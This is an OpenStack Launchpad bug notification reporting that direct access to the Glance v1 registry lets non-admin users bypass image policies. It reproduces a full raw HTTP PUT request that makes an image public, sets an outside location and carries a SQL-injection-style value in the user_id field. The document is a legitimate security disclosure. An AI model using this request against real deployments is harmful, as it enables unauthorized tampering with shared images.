Open Stack

Since there are no objections, I'm switching this to public and marking
as a hardening opportunity.

** Tags added: security

-- 
You received this bug notification because you are a member of OpenStack
Security, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1556023

Title:
  Direct v1 registry access can bypass Glance's policies

Status in Glance:
  New
Status in OpenStack Security Advisory:
  Won't Fix

Bug description:
  If a non-admin user can access the registry directly, then they can
  bypass Glance's policies.

  Here, for example, is a registry request which bypasses both the
  policy to mark an image as public, and to set the image location
  directly:

   PUT /images/37d89430-8bf2-433a-843e-909c752866df HTTP/1.1.
   Host: 127.0.0.1:9191.
   Content-Length: 606.
   Accept-Encoding: gzip, deflate.
   Accept: application/json.
   x-auth-token: dc9e09e4954d4b42983784b3c4642bd9.
   Connection: keep-alive.
   User-Agent: restfuzz-0.1.0.
   Content-Type: application/json.
   .

   {"image": {"status": "active", "deleted": false, "name":
  "testpublic", "container_format": "bare", "min_ram": 2147483647,
  "disk_format": "qcow2", "id": "37d89430-8bf2-433a-843e-909c752866df",
  "owner": "48c21395db63405d94aee1f965615d1c", "min_disk": 2147483647,
  "is_public": true, "properties": {"image_type": "snapshot",
  "instance_uuid": "7df74ad1-1caf-44ac-8f4b-4313f5fda5ed", "user_id":
  "76b4ded518594216832e06c261523074' or 1=1--", "base_image_ref":
  "1c8c3ba8-3a2f-4d06-b1ba-ac1791b599d8"}, "size": 6599958588555,
  "virtual_size": 6599958588551, "min_disk": 2147483647,
  "location":"http://google.com"}}

  Note that deployments should firewall the registry off; typical users should only have access to the Glance API endpoint.
  However, users such as a Swift administrator who does not have Glance admin powers but is able to access the 'private' network can bypass Glance's policies.

To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1556023/+subscriptions